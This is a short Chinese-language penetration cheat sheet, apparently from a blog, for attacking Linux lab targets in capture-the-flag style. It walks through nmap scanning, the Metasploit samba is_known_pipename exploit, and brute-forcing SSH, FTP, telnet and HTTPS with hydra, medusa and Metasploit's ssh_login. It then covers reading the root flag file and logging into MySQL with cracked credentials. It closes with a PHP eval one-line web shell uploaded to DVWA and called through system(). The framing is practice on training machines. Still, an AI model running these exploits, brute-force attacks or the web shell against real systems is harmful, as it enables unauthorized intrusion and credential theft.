渗透liunx思路
kali渗透liunx
1、首先使用nmap扫描靶机端口开放状态及版本信息:
命令:nmap -sV -T5 -n 靶机ip地址

2、然后进入渗透平台:
命令:msfconsole
3、进去之后就使用命令查找渗透samba的模块:
命令:search is_known
找到后就进入exploit/linux/samba/is_known_pipename模块
命令:use exploit/linux/samba/is_known_pipename
4、进入模块后,
查看需要设置哪些目标
命令:show options
然后设置目标地址
命令:set rhost 靶机地址
最后run运行
5、进去后你就可以执行你需要做的操作
渗透破解:
1、首先使用nmap扫描靶机22端口是否开放:
命令:nmap -sV -T5 -n 靶机ip地址

第一种方法(快速破解)
1、使用hydra进行密码爆破
使用命令:hydra -L 用户字典 -P 密码字典 ip地址 ssh
2、破解成功后,连接靶机
命令:ssh 靶机地址
3、连接成功后使用刚才破解出来的用户名和密码登录进入
4、然后就去root目录下查看flag值
命令:cat /root/flagvalue.txt
5、将查看到的字符串提交
ftp、telnet、http等服务也可使用hydra进行密码爆破
破解ftp:hydra ip地址 ftp -L 用户字典 -P 密码字典
破解telnet:hydra telnet ip地址 -L 用户字典 -P 密码字典
破解https:hydra ip地址 -L 用户字典 -P 密码字典 https_get
第二种方法(稳定破解)
1、使用medusa进行破解
medusa -M ssh -h 靶机ip地址 -U 用户字典 -P 密码字典
2、破解成功后,连接靶机
命令:ssh 靶机地址
3、连接成功后使用刚才破解出来的用户名和密码登录进入
4、然后就去root目录下查看flag值
命令:cat /root/flagvalue.txt
5、将查看到的字符串提交
ftp、telnet、http等服务也可使用medusa进行密码爆破
ftp破解:medusa -M ftp -h 靶机ip地址 -U 用户字典 -P 密码字典
telnet破解:medusa -M telnet -h 靶机ip地址 -U 用户字典 -P 密码字典
https破解:medusa -M https -h 靶机ip地址 -U 用户字典 -P 密码字典
第三种方法(枚举)
1、进入msfconsole渗透平台
然后查找渗透ssh的模块
命令:searh ssh_login,
2、找到后进入auxiliary/scanner/ssh/ssh_login
命令:use auxiliary/scanner/ssh/ssh_login
查看需要设置哪些目标
命令:show options
设置目标地址:set rhost 靶机地址
设置目标用户:set USER_FILE 用户字典
设置目标密码:set PASS_FILE 密码字典
运行:run
3、破解成功后,连接靶机
命令:ssh 靶机地址
4、连接成功后使用刚才破解出来的用户名和密码登录进入
5、然后就去root目录下查看flag值
命令:cat /root/flagvalue.txt
6、将查看到的字符串提交
ftp、telnet、http、mysql等服务也可使用msfconsole进行密码爆破
如数据库破解成功
就远程登录mysql数据库
命令:mysql -h ip -u 破解出来的用户名 -p
然后就输入破解出来的密码
然后就可以在mysql里操作
==================================================
一句话插入木马
首先创建一个1.txt,打开再写入<?php @eval($_GET["123"]);?>,然后把文件后缀改为1.php
找到靶机注入点然后上传编写好的php文件
如果上传成功就打开浏览器输入http://靶机地址/dvwa/hackable/uploads/1.php?123=system("cat /");
就是使用system函数读取的flag值
如果GET被过滤了就用使用POSH

浙公网安备 33010602011771号